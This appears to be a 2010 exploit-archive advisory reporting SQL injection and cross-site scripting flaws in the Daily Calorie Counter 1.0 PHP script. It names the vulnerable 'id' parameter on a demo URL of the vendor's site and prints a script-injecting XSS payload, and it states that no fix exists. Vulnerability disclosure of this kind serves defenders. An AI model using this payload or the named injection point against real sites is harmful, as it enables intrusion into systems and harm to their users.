Daily Calorie Counter 1.0 (SQL/XSS) Multiple Vulnerabilities

2010-06-11 14:02:08

Author: L0rd CrusAd3r aka VSN [[email protected]]
Exploit Title:Daily Calorie Counter SQL Injection Vulnerability
Vendor url:http://www.fullhealth.net/
Version:1.0
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members.
Spl Greetz to:inj3ct0r.com Team

#####################################################################################################################################################################################################

Description:

You could simply add Daily Calorie Counter php script into your web page. No php
skills needed. No mysql or any other database. There are oer 200 activities included, and also you could add new activities. Also it is completely free.

#######################################################################################################################################################################################################

Vulnerability:

*SQLi Vulnerability

DEMO URL :http://www.fullhealth.net/article.php?id=[sqli]

*XSS Vulnerability

Parameter:'"--><script>alert(0x000872)</script>

DEMO URL:ttp://www.fullhealth.net/article.php?id=[xss]

# 0day n0 m0re #

--
With R3gards,
L0rd CrusAd3r

Fixes

No fixes

In order to submit a new fix you need to be registered.